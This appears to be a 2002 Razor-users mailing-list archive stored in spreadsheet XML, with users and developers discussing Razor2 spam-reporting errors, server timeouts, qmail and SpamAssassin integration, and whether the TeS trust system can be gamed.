fixed 15 minutes from now, just that it's not currently working, 
and there have been a number of "hiccup" periods in the last 
couple months.  Plus, it's hard to deny that we don't know yet 
if the trust network is going to work or not -- it only just got 
switched on, and that changeover seems to have corresponded with 
people noticing things have stopped working right.COn Thursday, August 8, 2002, at 01:44  PM, Jordan Ritter wrote:&gt; On Thu, Aug 08, 2002 at 01:36:15PM -0700, Craig R.Hughes wrote:
&gt;
&gt; # Razor2 seems to have been a long time in coming, [...] and doesn't
&gt; # currently work.
&gt;
&gt; Quite a strong statement, Craig, one which over 30,000 active users a
&gt; day would strongly disagree with.
&gt;
&gt;
&gt; --jordan
&gt;-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
On Monday, August 12, 2002, at 11:06  AM, Jehan wrote:&gt; Craig R.Hughes wrote:
&gt;&gt; This is, I think the biggest fallacy here.  You don't have to 
&gt;&gt; block jack shit to get a high trust rating, you just have to 
&gt;&gt; confirm Razor's existing opinion on a large number of messages:
&gt;&gt; if(check() == spam) then submit() else revoke()
&gt;&gt; That algorithm boosts trust, but reduces the information in 
&gt;&gt; SpamNet by damping.
&gt;
&gt; If you know a way to prevent people (spammer or not) to do that 
&gt; while allowing you to do it, pray, tell me.
&gt;
&gt; And I imagine easily that if someone submit/revoke at a very 
&gt; high rate, some alarm triggers on Razor's server resulting in 
&gt; their user id to be disabled/deleted.
&gt; I also suspect that the more you submit/revoke the same mail, 
&gt; the less influence it has on your trust. And since there isn't 
&gt; millions of different spam (it's always the same ones coming 
&gt; back over and over with maybe one or two different words, i.e. 
&gt; the same mail if fuzzy signatures work well), I guess that 
&gt; spammer will reach there limit pretty quickly.I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 can't think of one right now but "AOL 
proxy server" springs to mind as an example from another domain.C-------------------------------------------------------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</si>
  <si>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Justification could be "This user has a great track record", he 
has agreed with me every single time out of hundreds of times in 
the past.COn Monday, August 12, 2002, at 11:42  AM, Jehan wrote:&gt; And I also think that people listen more to people justifying 
&gt; their argumentation than people just giving a result. But 
&gt; justification will never work in Razor.-------------------------------------------------------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</si>
  <si>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Craig R.Hughes wrote:
&gt; I was thinking you could easily create a spamtrap which you subscribe to 
&gt; lots of legitimate nonspam mailing lists, plus you also spread the email 
&gt; address around and get it in the hands of lots of spammers so it ends up 
&gt; receiving large quantities of both spam and nonspam, then you have it 
&gt; apply the algorithm above to the incoming mail stream.  So it could be 
&gt; thousands of actual real, different, emails per day.  The "very high 
&gt; rate triggers alarms" thing is certainly something which would be 
&gt; possible to check for, but there may be legitimate ways to exhibit this 
&gt; behavior -- can't think of one right now but "AOL proxy server" springs 
&gt; to mind as an example from another domain.If there is a maximum trust value (if trust is some sort of percentage
for instance), and if it isn't impossible to reach it, that would 
prevent too few people to get too much of an avantage. My guess is if 1% 
of razor users can reach this limit (or be near enough), spammers won't 
be able to cheat just by building up their trust, they would need a fair 
amount of fake users too.Now, for the "fair amount of fake users", spammers don't have access to 
many set of network classes. So they would need a bunch of users coming 
from the same set of ips. If the razor servers see 100 people on a class 
C network (253 ips) reporting 10000 emails a day, something wrong is 
going on. This could also trigger alarms.As for legitimate proxies and the like, 1) a proxy should not report any
thing (spam should be reported by hand, not automatically), 2)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line/cable, the set of ip is probably quite small even less than a class 
C (using network subclassing). The spammers could still try to have 
several connections at different locations, but that increases their 
cost and so is not so much interesting.	Jehan-------------------------------------------------------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</si>
  <si>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08/08/02 15:26 -0700, Chip Paswater wrote:
) &gt; 
) &gt; Well, a little more than one bit -- you have to transmit the 
) &gt; signature, plus now the entire message body.  Plus your ID.  
) &gt; Plus the rights to all intellectual property contained in any 
) &gt; email message you submit (I guess technically there are no bits 
) &gt; in the rights assignment)
) 
) Perhaps a feature can be added to razor-report, so that it checks whether a
) message is spam before it submits it.  If it is spam, then don't send the
) body, 4 signatures, etc, just up the "rating" for that individual spam.  razor-report only sends the body if the server does not have
  a copy already.  When it does, and the server just notes who also
  thinks that mail is spam, and uses that info in TeS.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</si>
  <si>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Can you send more details about the error?
  and also do a 'razor-report -v' to make sure 2.x is being called.  -chadOn 11/08/02 21:09 -0500, Mike Burger wrote:
) Ok...I need to amend this.
) 
) I don't get the error when I check the spam...just when I go to report it.
) 
) On Sun, 11 Aug 2002, Mike Burger wrote:
) 
) &gt; I did...unfortunately, now I get this:
) &gt; 
) &gt; Died at /usr/bin/razor-check line 32,  line 1.
) &gt; 
) &gt; Did I need to remove and reinstall, or something.  I just did a make 
) &gt; install over the existing installation.
) &gt; 
) &gt; On Sun, 11 Aug 2002, Vipul Ved Prakash wrote:
) &gt; 
) &gt; &gt; On Sun, Aug 11, 2002 at 07:39:41AM -0500, Mike Burger wrote:
) &gt; &gt; &gt; 
) &gt; &gt; &gt; Any ideas what might have changed, here? I'm running razor-agents-2.12, 
) &gt; &gt; &gt; and razor-agents-sdk-2.0.3.
) &gt; &gt; 
) &gt; &gt; Mike, 
) &gt; &gt; 
) &gt; &gt; Please upgrade to 2.14 as many bugs were fixed between the two releases, and 
) &gt; &gt; see if your problem persists.
) &gt; &gt; 
) &gt; &gt; cheers,
) &gt; &gt; vipul.
) &gt; &gt; 
) &gt; &gt; 
) &gt; 
) &gt; 
) &gt; 
) &gt; -------------------------------------------------------
) &gt; This sf.net email is sponsored by:ThinkGeek
) &gt; Welcome to geek heaven.
) &gt; http://thinkgeek.com/sf
) &gt; _______________________________________________
) &gt; Razor-users mailing list
) &gt; Razor-users@lists.sourceforge.net
) &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
) &gt;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</si>
  <si>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This is bizarre. The numbers should not just disappear.  Try 
  with the '-n' switch which prints out a '-' before legit mails.  razor-check -n mail/caughtspam
  If that still appears broken, can you do the following statement and
  send me 'spam_fileno' and 'razor.log'   razor-check -n -logfile=razor.log -dl=13 mail/caughtspam &gt;spam_fileno
  -chad
On 11/08/02 07:39 -0500, Mike Burger wrote:
) Since last night, I've been getting odd results...or, rather, a lack of
) results from razor-check.
) 
) I am using SpamAssassin, and have my .procmailrc set up to dump any tagged
) spam into its own folder under my ~/mail directory.
) 
) When I get any new messages in that folder, I run razor-check against 
) them, like so:
) 
) razor-check &lt; mail/caughtspam
) 
) Previously, if I just ran razor-check against such a batch of spam, it 
) would report the message numbers, in the batch, that were known spam.  I 
) would then delete the known spam from the batch, and then run:
) 
) razor-report &lt; mail/caughtspam 
) 
) to submit the rest, after confirming that 
) it was, indeed, spam. (I should tell you that since using SA 2.31, I've 
) had less than 1% of the messages it's tagged wind up as false positives, 
) but I've taken the advice of many here, and am not just automatically 
) reporting).
) 
) As I said, previously, razor-check would tell me which messages were known 
) spam.  For example, if I ran razor-check against a batch of 5 messages, 
) and message #2 and #4 were known spam, the end result would look like 
) this:
) 
) 2
) 4
) 
) But, starting yesterday, it stopped doing this.  Now, I've got to call 
) 
) razor-check -d &lt; mail/caughtspam
) 
) And look for the "mail id # is known spam" before I can eliminate it.
) 
) The last 4 messages I checked, I had to do the same thing.
) 
) I've changed nothing in my razor installation or configuration.
) 
) Any ideas what might have changed, here? I'm running razor-agents-2.12, 
) and razor-agents-sdk-2.0.3.
) 
) Thanks.
) 
) --Mike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</si>
  <si>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I seem to be getting the known spam message numbers, now, using 
2.14...now, I'm just wondering about the error at the end of the 
check/report procedure.On Mon, 12 Aug 2002, Chad Norwood wrote:&gt; 
&gt;   This is bizarre. The numbers should not just disappear.  Try 
&gt;   with the '-n' switch which prints out a '-' before legit mails.
&gt; 
&gt;   razor-check -n mail/caughtspam
&gt;   
&gt;   If that still appears broken, can you do the following statement and
&gt;   send me 'spam_fileno' and 'razor.log' 
&gt; 
&gt;   razor-check -n -logfile=razor.log -dl=13 mail/caughtspam &gt;spam_fileno
&gt;   
&gt;   -chad
&gt;   
&gt; On 11/08/02 07:39 -0500, Mike Burger wrote:
&gt; ) Since last night, I've been getting odd results...or, rather, a lack of
&gt; ) results from razor-check.
&gt; ) 
&gt; ) I am using SpamAssassin, and have my .procmailrc set up to dump any tagged
&gt; ) spam into its own folder under my ~/mail directory.
&gt; ) 
&gt; ) When I get any new messages in that folder, I run razor-check against 
&gt; ) them, like so:
&gt; ) 
&gt; ) razor-check &lt; mail/caughtspam
&gt; ) 
&gt; ) Previously, if I just ran razor-check against such a batch of spam, it 
&gt; ) would report the message numbers, in the batch, that were known spam.  I 
&gt; ) would then delete the known spam from the batch, and then run:
&gt; ) 
&gt; ) razor-report &lt; mail/caughtspam 
&gt; ) 
&gt; ) to submit the rest, after confirming that 
&gt; ) it was, indeed, spam. (I should tell you that since using SA 2.31, I've 
&gt; ) had less than 1% of the messages it's tagged wind up as false positives, 
&gt; ) but I've taken the advice of many here, and am not just automatically 
&gt; ) reporting).
&gt; ) 
&gt; ) As I said, previously, razor-check would tell me which messages were known 
&gt; ) spam.  For example, if I ran razor-check against a batch of 5 messages, 
&gt; ) and message #2 and #4 were known spam, the end result would look like 
&gt; ) this:
&gt; ) 
&gt; ) 2
&gt; ) 4
&gt; ) 
&gt; ) But, starting yesterday, it stopped doing this.  Now, I've got to call 
&gt; ) 
&gt; ) razor-check -d &lt; mail/caughtspam
&gt; ) 
&gt; ) And look for the "mail id # is known spam" before I can eliminate it.
&gt; ) 
&gt; ) The last 4 messages I checked, I had to do the same thing.
&gt; ) 
&gt; ) I've changed nothing in my razor installation or configuration.
&gt; ) 
&gt; ) Any ideas what might have changed, here? I'm running razor-agents-2.12, 
&gt; ) and razor-agents-sdk-2.0.3.
&gt; ) 
&gt; ) Thanks.
&gt; ) 
&gt; ) --Mike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</si>
  <si>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It's got to be razor 2.x...I've never installed razor 1.x However:[mburger@burgers mburger]$ razor-report -v
Razor Agents 2.14, protocol version 3As to more details...I don't have any...it runs, seems to do its thing, 
and then gives that error.On Mon, 12 Aug 2002, Chad Norwood wrote:&gt;   Can you send more details about the error?
&gt;   and also do a 'razor-report -v' to make sure 2.x is being called.
&gt; 
&gt;   -chad
&gt; 
&gt; On 11/08/02 21:09 -0500, Mike Burger wrote:
&gt; ) Ok...I need to amend this.
&gt; ) 
&gt; ) I don't get the error when I check the spam...just when I go to report it.
&gt; ) 
&gt; ) On Sun, 11 Aug 2002, Mike Burger wrote:
&gt; ) 
&gt; ) &gt; I did...unfortunately, now I get this:
&gt; ) &gt; 
&gt; ) &gt; Died at /usr/bin/razor-check line 32,  line 1.
&gt; ) &gt; 
&gt; ) &gt; Did I need to remove and reinstall, or something.  I just did a make 
&gt; ) &gt; install over the existing installation.
&gt; ) &gt; 
&gt; ) &gt; On Sun, 11 Aug 2002, Vipul Ved Prakash wrote:
&gt; ) &gt; 
&gt; ) &gt; &gt; On Sun, Aug 11, 2002 at 07:39:41AM -0500, Mike Burger wrote:
&gt; ) &gt; &gt; &gt; 
&gt; ) &gt; &gt; &gt; Any ideas what might have changed, here? I'm running razor-agents-2.12, 
&gt; ) &gt; &gt; &gt; and razor-agents-sdk-2.0.3.
&gt; ) &gt; &gt; 
&gt; ) &gt; &gt; Mike, 
&gt; ) &gt; &gt; 
&gt; ) &gt; &gt; Please upgrade to 2.14 as many bugs were fixed between the two releases, and 
&gt; ) &gt; &gt; see if your problem persists.
&gt; ) &gt; &gt; 
&gt; ) &gt; &gt; cheers,
&gt; ) &gt; &gt; vipul.
&gt; ) &gt; &gt; 
&gt; ) &gt; &gt; 
&gt; ) &gt; 
&gt; ) &gt; 
&gt; ) &gt; 
&gt; ) &gt; -------------------------------------------------------
&gt; ) &gt; This sf.net email is sponsored by:ThinkGeek
&gt; ) &gt; Welcome to geek heaven.
&gt; ) &gt; http://thinkgeek.com/sf
&gt; ) &gt; _______________________________________________
&gt; ) &gt; Razor-users mailing list
&gt; ) &gt; Razor-users@lists.sourceforge.net
&gt; ) &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
&gt; ) &gt;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</si>
  <si>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You should not be reporting spam to 64.90.187.2 (apt).
  You need to report only to nomination servers, which, like
  catalogue servers, can and will be changed, and are
  set by the discovery servers.  Razor agents do discovery
  for you automatically, storing server names in .razor/*.lst files
  -chad
On 10/08/02 10:48 +0530, Raghavendra Bhat wrote:
) Hello List:
) 
) I have been  using Razor for quite a while.  I  have been reporting spam
) to the server at 64.90.187.2 from mutt.
) 
) I am  unable to report as  of the past  two days.  The message  which is
) echoed back says 'Connection refused'.
) 
) Am I  doing some brain  dead thing ?   If not are there  other reporting
) servers ?
) 
) -- 
) ragOO, VU2RGU&lt;-&gt;http://gnuhead.dyndns.org/&lt;-&gt;GPG: 1024D/F1624A6E     
)        Helping to keep the  Air-Waves FREE         Amateur Radio
)        Helping to keep your Software  FREE       the GNU Project          
)        Helping to keep the  W W W     FREE  Debian GNU/${kernel}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</si>
  <si>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09/08/02 20:49 -0400, Sven wrote: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It's a network error - That string is not created by 
  Razor Agents.  Its trying to connect and having trouble.  
  1700 times seems abnormally high.  How many successful
  connections were there in the same timespan?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The timeout is hardcoded to 15 secs.  
  No plans right now to make that an option.
  You can always edit the source - Core.pm.  :)
) 3) What are the plans for fire.cloudmark, apt.cloudmark, ubik.cloudmark?  It seems that we have all these catalogue servers yet a good portion of the time, only one is available or the last discovery ends up only listing one (currently honor.cloudmark) in the cataloge.lst file.  The system is designed so servers can be added and 
  subtracted without the clients caring - if the razor
  client can't connect to a server, it re-discovers, getting
  all currently available servers and stores results locally.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 It really looks like there is a great potential here for a very workable tool and if I can get some of these issues addressed or can even be of some assistance, all the better .....
) 
) Sven Willenberger
) Systems Administration
) Delmarva Online, Inc.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</si>
  <si>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 Original Message -----
&gt; Date: Mon, 12 Aug 2002 18:23:34 -0700
&gt; From: Chad Norwood 
&gt; To: Sven 
&gt; Cc: razor-users@example.sourceforge.net
&gt; Subject: [Razor-users] Re: Questions on miscellaneous errata and issues
&gt;
&gt; On 09/08/02 20:49 -0400, Sven wrote:
&gt;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&gt; )
&gt;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&gt;
&gt;   It's a network error - That string is not created by
&gt;   Razor Agents.  Its trying to connect and having trouble.
&gt;   1700 times seems abnormally high.  How many successful
&gt;   connections were there in the same timespan?
&gt;Today was not as bad ... apt.cloudmark was the server du jour and
experienced about 800 "Unable to connect .... Reason: Operation now in
progress" out of some 189,000 "bootup[1]"  or roughly 0.5% -- better than
the 1% before but still a bit higher than I would like. I suspect it is
because a previous timeout from razor-agents has a process id that is being
held by an open milter socket. The process id's cycle, the number comes up
again and the error occurs as a duplicate pid occurs. I will tweak my milter
settings to shorten the total time to allow the socket to live per connect.&gt;
&gt;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&gt;
&gt;   The timeout is hardcoded to 15 secs.
&gt;   No plans right now to make that an option.
&gt;   You can always edit the source - Core.pm.  :)In looking at Core.pm I find a couple possible places where that code might
be. Is it:
    my $select = new IO::Select ($sock);
    my @handles = $select-&gt;can_read (15);
    if ($handles[0]) {
        $self-&gt;log (8,"Connection established");
        my $greeting = &lt;$sock&gt;;
        # $sock-&gt;autoflush; # this is on by default as of IO::Socket 1.18
        $self-&gt;{sock} = $sock;
        $self-&gt;{connected_to} = $server;
        $self-&gt;{select} = $select;
        $self-&gt;log(4,"$server &gt;&gt; ". length($greeting) ." server greeting:
$greeting");        return 1 if $params{discovery_server};
        unless ($self-&gt;parse_greeting($greeting) ) {
            $self-&gt;nextserver or return $self-&gt;errprefix("connect2");
            return $self-&gt;connect;
        }
        return 1;
    } else {
        $self-&gt;log (3, "Timed out (15 sec) while reading from
$self-&gt;{s}-&gt;{ip}.");
??????
or
    unless ($sock) {
        $sock = IO::Socket::INET-&gt;new(
                            PeerAddr =&gt; $server,
                            PeerPort =&gt; $port,
                            Proto    =&gt; 'tcp',
                            Timeout  =&gt; 20,
                     );
        unless ( $sock ) {
            $self-&gt;log (3,"Unable to connect to $server:$port; Reason:
$!.");
            return if $params{discovery_server};
            $self-&gt;nextserver or return $self-&gt;errprefix("connect1");
            return $self-&gt;connect;
        }
    }
??????
[of course the latter reflects a differenct timeout setting altogether - one
part for proxy, the other for non-proxy]&gt;
&gt;
&gt; ) 3) What are the plans for fire.cloudmark, apt.cloudmark, ubik.cloudmark?
It seems that we have all these catalogue servers yet a good portion of the
time, only one is available or the last discovery ends up only listing one
(currently honor.cloudmark) in the cataloge.lst file.
&gt;
&gt;   The system is designed so servers can be added and
&gt;   subtracted without the clients caring - if the razor
&gt;   client can't connect to a server, it re-discovers, getting
&gt;   all currently available servers and stores results locally.
&gt;I changed the default discovery period to every 12 hours in order to
compensate for the recent sporadic nature of the servers' availability (I
realize that the issue was related to syncing and server upgrades .... but I
might as well play it safe for a while).&gt;
&gt;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&gt;
&gt;   We are looking into releasing caching catalogue servers
&gt;   for those besides us to use.If I can be of help or if you have details about to participate in this
portion (caching or catalogueing), please let me know.&gt;
&gt;
&gt; ) It really looks like there is a great potential here for a very workable
tool and if I can get some of these issues addressed or can even be of some
assistance, all the better .....
&gt; )
&gt; ) Sven Willenberger
&gt; ) Systems Administration
&gt; ) Delmarva Online, Inc.
&gt;
&gt;
&gt;   Thanks!
&gt;
&gt;   -chad
&gt;
&gt;
&gt;
&gt; --__--__--
&gt;
&gt; _______________________________________________
&gt; Razor-users mailing list
&gt; Razor-users@lists.sourceforge.net
&gt; https://lists.sourceforge.net/lists/listinfo/razor-users
&gt;
&gt;
&gt; End of Razor-users Digest-------------------------------------------------------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</si>
  <si>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12/08/02 22:38 -0400, Sven wrote:
) 
) &gt;   The timeout is hardcoded to 15 secs.
) &gt;   No plans right now to make that an option.
) &gt;   You can always edit the source - Core.pm.  :)
)   Correction - It is 15 secs for read/write, 
  but 20 secs for initial connect.) In looking at Core.pm I find a couple possible places where that code might
) be. Is it:  So if you want to adjust the initial connect timeout, 
  edit Core.pm:1622 in version 2.14
  For reads and writes, lines 1463, 1481.  
) &gt;   The system is designed so servers can be added and
) &gt;   subtracted without the clients caring - if the razor
) &gt;   client can't connect to a server, it re-discovers, getting
) &gt;   all currently available servers and stores results locally.
) &gt;
) 
) I changed the default discovery period to every 12 hours in order to
) compensate for the recent sporadic nature of the servers' availability (I
) realize that the issue was related to syncing and server upgrades .... but I
) might as well play it safe for a while).  If a server is taken out the clients will connect, fail, re-discover 
  automatically, save results, and continue to use the other servers.
  You don't *need* to change anything, it will all work out. ) &gt;   We are looking into releasing caching catalogue servers
) &gt;   for those besides us to use.
) 
) If I can be of help or if you have details about to participate in this
) portion (caching or catalogueing), please let me know.  ok,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</si>
  <si>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Mon, Aug 12, 2002 at 10:38:44AM -0700, Craig R . Hughes wrote:
&gt; This is, I think the biggest fallacy here.  You don't have to 
&gt; block jack shit to get a high trust rating, you just have to 
&gt; confirm Razor's existing opinion on a large number of messages:
&gt; 
&gt; if(check() == spam) then submit() else revoke()
&gt; 
&gt; That algorithm boosts trust, but reduces the information in 
&gt; SpamNet by damping.Again, this is not true. Only certain events (reports/revokes) for a spam
are rewarded and the algorithm for picking these up is based on many
different factors.-- Vipul Ved Prakash          |   "The future is here, it's just not 
Software Design Artist     |    widely distributed."
http://vipul.net/          |              -- William Gibson-------------------------------------------------------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</si>
  <si>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Mon, Aug 12, 2002 at 08:33:26PM -0700, Vipul Ved Prakash wrote:
&gt; On Mon, Aug 12, 2002 at 10:38:44AM -0700, Craig R . Hughes wrote:
&gt;&gt; 
&gt;&gt; if(check() == spam) then submit() else revoke()
&gt;&gt; 
&gt;&gt; That algorithm boosts trust, but reduces the information in 
&gt;&gt; SpamNet by damping.
&gt; 
&gt; Again, this is not true. Only certain events (reports/revokes) for a spam
&gt; are rewarded and the algorithm for picking these up is based on many
&gt; different factors.A lot of the questions/concerns brought up on this list wrt
TeS will be lessened when the source for it is released.  Any
guestimate on when that might happen?-steve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</si>
  <si>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Thank you for your response I will verify that I have taken these steps
that you have metioned but as well I would like to stop mail from
entering my mail boxes and need the info about how to integrate with
qmail in newbie terms if that is possible.  Thank you again for your
helpMichael Humphries
Alphacomm.net
Network Administrator
906-639-3500
877-450-3500
adminmjh@alphacomm.net
www.alphacomm.net 
-----Original Message-----
From: razor-users-admin@example.sourceforge.net
[mailto:razor-users-admin@lists.sourceforge.net] On Behalf Of Daniel
Higgins
Sent: Tuesday, August 13, 2002 10:15 AM
To: razor-users@example.sourceforge.net
Subject: Re: [Razor-users] FW: intigration with qmaili don't think you get exactly what razor does. razor is used to stop
spam
from entering a mail box, not to leave a mail server. altough you could
probably use it that way i doubt it would do much good (if the mail is
leaving the server, it most likely is a new spam and wouldn`t get caught
by
razor)you might want to look into dealing with those troublesome users
directly.
and (as you`ve probably been screamed at a lot of times) close your open
relay if you have one, there are plenty of sites that tells you how
(most
RBL sites)
--
Daniel Higgins
Netcommunications Inc.
Administrateur SystÃ¨me / Network Administrator
Tel: 450-346-3401
Fax: 450-346-3587
dhiggins@netc.net
http://www.netc.net
----- Original Message -----
From: "Michael J Humphries" 
To: 
Sent: Tuesday, August 13, 2002 10:44 AM
Subject: [Razor-users] FW: intigration with qmail
&gt; I sent this message already and I am sorry if I am asking the wrong
&gt; question or if I have been asking stupid questions but I am in an
urgent
&gt; time when people are using my service to spam others and I NEED to
stop
&gt; them quickly. I hope that some one can help if not please just let me
&gt; know that I have been asking the bad questions or I need to be in a
&gt; different list serv.  Thank you all so much for your time
&gt;
&gt; Michael Humphries
&gt; Alphacomm.net
&gt; Network Administrator
&gt; 906-639-3500
&gt; 877-450-3500
&gt; adminmjh@alphacomm.net
&gt; www.alphacomm.net
&gt;
&gt;
&gt; -----Original Message-----
&gt; From: Michael J Humphries [mailto:adminmjh@alphacomm.net]
&gt; Sent: Friday, August 09, 2002 2:25 PM
&gt; To: 'razor-users@example.sourceforge.net'
&gt; Subject: intigration with qmail
&gt;
&gt; i have Redhat 7.2 and qmail 1.0.2 and vpopmail 5.3.8 I am tring to
&gt; intigrate the -revoke -check etc.. and can not find where to do so I
&gt; only found the procmail example. Is there a place I can find this
&gt; information or has someone already run into this and found the way to
&gt; get this done
&gt;
&gt; Michael Humphries
&gt; Alphacomm.net
&gt; Network Administrator
&gt; 906-639-3500
&gt; 877-450-3500
&gt; adminmjh@alphacomm.net
&gt; www.alphacomm.net
&gt;
&gt;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t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 09:44:33AM -0500, Michael J Humphries wrote:
&gt; I sent this message already and I am sorry if I am asking the wrong
&gt; question or if I have been asking stupid questions but I am in an urgent
&gt; time when people are using my service to spam others and I NEED to stop
&gt; them quickly.Sounds like you're solving the wrong problem.  If untrusted strangers
are relaying spam through your qmail server, it's a fair bet that
you've seriously botched your qmail config (like forgetting to create
an rcpthosts file or something).Anyway, if you insist on using razor to resolve this problem, I
would suggest tossing qmail-scanner 
and SpamAssassin  into the mix as well.
The former provides the qmail-integration framework on which the latter
does its work (including razor-check invocations).Fair warning: It'll be far more resource-intensive than simply denying
relaying privileges to everyone except the folks you trust.  To find
out how to do that, go to  (which, incidentally,
should be your first stop for all things qmail) and search for "qmail
newbie's guide to relaying".- Adrian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</si>
  <si>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I'm assuming I need to strip the SpamAssassinReport.txt attachments 
from my spam mailbox before I run the mailbox through razor-report, 
correct?  Does anyone know of an easy way to do this?Thanks
  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</si>
  <si>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At 10:12 AM -0700 8/13/02, Patrick wrote:
&gt;On Tue, 13 Aug 2002, Justin Shore wrote:
&gt;
&gt;&gt;  I'm assuming I need to strip the SpamAssassinReport.txt attachments
&gt;&gt;  from my spam mailbox before I run the mailbox through razor-report,
&gt;&gt;  correct?  Does anyone know of an easy way to do this?
&gt;
&gt;man spamassassinWhoops.  Sorry 'bout that.  Didn't think to check spamassassin's man page.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</si>
  <si>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At 1:52 PM -0400 8/13/02, Theo Van Dinter wrote:
&gt;On Tue, Aug 13, 2002 at 11:58:03AM -0500, Justin Shore wrote:
&gt;&gt;  I'm assuming I need to strip the SpamAssassinReport.txt attachments
&gt;&gt;  from my spam mailbox before I run the mailbox through razor-report,
&gt;&gt;  correct?  Does anyone know of an easy way to do this?
&gt;
&gt;use "spamassassin -r".  It'll take a message, strip the SA bits, and
&gt;report to razor, all in one shot. :)Ah...  You learn something new every day!  This would make things 
quite a bit easier.  I assume it can handle a mailbox full of mail to 
report rather than a single piece of spam from STDIN.  I'll check the 
docs on that though.Thanks!
  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</si>
  <si>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Tue, 13 Aug 2002, David Raistrick wrote:&gt; On Tue, 13 Aug 2002, Patrick wrote:
&gt;
&gt; &gt; On Tue, 13 Aug 2002, Justin Shore wrote:
&gt; &gt;
&gt; &gt; &gt; I'm assuming I need to strip the SpamAssassinReport.txt attachments
&gt; &gt; &gt; from my spam mailbox before I run the mailbox through razor-report,
&gt; &gt; &gt; correct?  Does anyone know of an easy way to do this?
&gt; &gt;
&gt; &gt; man spamassassin
&gt;
&gt;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&gt;
&gt; grep -v "SPAM:" | sed 's/Subject: \*\*\*\*\*SPAM\*\*\*\*\* /Subject: /'Why not just use spamassassin -r?
       -r, --report
           Report this message as verified spam.  This will sub-
           mit the mail message read from STDIN to various spam-
           blocker databases, such as Vipul's Razor (
           http://razor.sourceforge.net/ ) and the Distributed
           Checksum Clearinghouse ( http://www.rhyolite.com/anti-
           spam/dcc/ ).           If the message contains SpamAssassin markup, this will
           be stripped out automatically before submission.
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                               Patrick Greenwell
         Asking the wrong questions is the leading cause of wrong answers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</si>
  <si>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At 12:20 PM -0500 8/13/02, Mike Burger wrote:
&gt;Make sure you have this in your .spamassassin/user_prefs:This might be a problem.  I'll have to look into it further.  I just 
got SA working yesterday.  It's being called from MIMEDefang.  I'm 
not sure if it will look for user preferences when run like that. 
One would hope it would be I can't say for certain.  I'll look in to 
it.&gt;# By default, the subject lines of suspected spam will be tagged.
&gt;# This can be disabled here.
&gt;#
&gt;rewrite_subject 0Yeah, I disabled the subject rewrite.  I also lowered required_hits 
to 1 (wonder if I can do zero) so that almost all mail is scored--I'm 
testing it right now.  auto_report_threshold was raised to 100 to 
make sure that all mail gets through to me for now.&gt;# By default, spamassassin will include its report in the body
&gt;# of suspected spam. Enabling this causes the report to go in the
&gt;# headers instead. Using 'use_terse_report' for this is recommended.
&gt;#
&gt;report_header 1Ah, now I didn't notice this.  I rather like this option.  I may set 
my global default to this.&gt;The first tells it not to add *****SPAM***** to the subject, the second
&gt;tells it to put the report in the headers, instead of the body.
&gt;
&gt;If the report is in the headers, it won't be calculated in the
&gt;razor-check.This makes sense.  I may do that for just this reason.  Thanks!Justin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</si>
  <si>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Tue, Aug 13, 2002 at 01:01:42PM -0500, Justin Shore wrote:
&gt; Ah...  You learn something new every day!  This would make things 
&gt; quite a bit easier.  I assume it can handle a mailbox full of mail to 
&gt; report rather than a single piece of spam from STDIN.  I'll check the 
&gt; docs on that though.Unfortunately not, it's a one at a time thing.  If it would help
you, I have a script that I use which handles a mbox file at a time,
strips the SA stuff, reports to razor, and can then do things like
open relay checks, reports to spamcop, etc.  It's available via:
http://www.kluge.net/~felicity/random/handlespam.txt
:)-- 
Randomly Generated Tagline:
"But you have to allow a little for the desire to evangelize when you
 think you have good news."         - Larry Wall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</si>
  <si>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At 2:46 PM -0400 8/13/02, Theo Van Dinter wrote:
&gt;On Tue, Aug 13, 2002 at 01:01:42PM -0500, Justin Shore wrote:
&gt;&gt;  Ah...  You learn something new every day!  This would make things
&gt;&gt;  quite a bit easier.  I assume it can handle a mailbox full of mail to
&gt;&gt;  report rather than a single piece of spam from STDIN.  I'll check the
&gt;&gt;  docs on that though.
&gt;
&gt;Unfortunately not, it's a one at a time thing.  If it would help
&gt;you, I have a script that I use which handles a mbox file at a time,
&gt;strips the SA stuff, reports to razor, and can then do things like
&gt;open relay checks, reports to spamcop, etc.  It's available via:
&gt;http://www.kluge.net/~felicity/random/handlespam.txtI'll give that a looksie.  I've been running a week's worth of 
maillog relay= IPs through rbcheck every Sunday.  Found quite a few. 
I should break up the list and run multiple rbcheck instances.  Just 
haven't gotten there yet though.  I think I'll have either MIMEDefang 
or Procmail keep a copy of messages over a certain score for daily 
razor-reporting.  I could just let SA do it too I suppose.Say, maybe you can tell me what I'm doing wrong in SA.  I added 
report_header 1 to my 
/etc/mail/mimedefang/spamassassin/sa-mimedefang.cf but it didn't 
appear to change anything.  I bounced over another copy of spam to my 
spamtrap and it still created the SPAM: attachment.  sa-mimedefang.cf 
has this in it now:required_hits           1
auto_report_threshold   100
ok_locales              en
rewrite_subject 0
report_header 1
use_terse_report 1
defang_mime 0
skip_rbl_checks 1I can't figure out if that was the write cf to modify or not.  I also 
have a /etc/mail/spamassassin/local.cf but it's empty.  I think I 
might be taking too many bites out of too many pies at once. :-)  The 
required_hits changes I made to sa-mimedefang.cf seem to have worked. 
I don't know why the report_header change didn't though.  Any ideas?Justin
-- --
Justin Shore, ES-SS ES-SSR      Pittsburg State University
Network &amp; Systems Manager       Kelce 157Q
Office of Information Systems   Pittsburg, KS 66762
Voice: (620) 235-4606           Fax: (620) 235-4545
http://www.pittstate.edu/ois/Warning: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</si>
  <si>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Tue, 13 Aug 2002, Theo Van Dinter wrote:&gt; On Tue, Aug 13, 2002 at 11:58:03AM -0500, Justin Shore wrote:
&gt; &gt; I'm assuming I need to strip the SpamAssassinReport.txt attachments 
&gt; &gt; from my spam mailbox before I run the mailbox through razor-report, 
&gt; &gt; correct?  Does anyone know of an easy way to do this?
&gt; 
&gt; use "spamassassin -r".  It'll take a message, strip the SA bits, and
&gt; report to razor, all in one shot. :)As long as you're not using razor2, that is, right?-------------------------------------------------------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</si>
  <si>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Tue, 13 Aug 2002, David Raistrick wrote:&gt;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razor-report:I wouldn't make that assumption.  I'd assume that rewrite_subject was on, 
and report_header was off, because that's the default configuration, and 
